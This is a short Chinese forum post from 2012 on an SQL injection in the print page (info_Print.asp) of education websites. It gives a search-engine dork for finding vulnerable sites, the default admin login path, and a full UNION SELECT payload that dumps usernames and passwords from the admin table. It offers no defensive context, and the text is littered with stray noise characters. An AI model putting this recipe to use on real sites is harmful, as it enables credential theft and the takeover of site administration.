教育站打印页面漏洞( u5 i% G) G+ U& \
百度或google搜索 inurl:info_Print.asp?ArticleID=% K/ h' b- b0 B2 [& F7 z: `. h: G
默认后台:/ad_login.asp
8 z8 A6 Q3 \9 ]1 C ~爆管理员密码:
* w# \0 B$ F' F2 o% |8 \6 g, `在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可+ J) D t6 @+ z6 y; H6 p
k/ ~2 P) L7 Junion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
2 X) t; f4 v: r
& x% j# W5 z) O: F6 }. T' I作者:佚名 7 z- v4 x5 v- J3 p3 E7 ]
2 T4 v6 b8 {3 T) e/ w0 A6 I
* Z" _/ j' z" _6 A8 |2 }+ u8 H" \ |
发表于 2012-10-31 08:37:31
收藏
支持
反对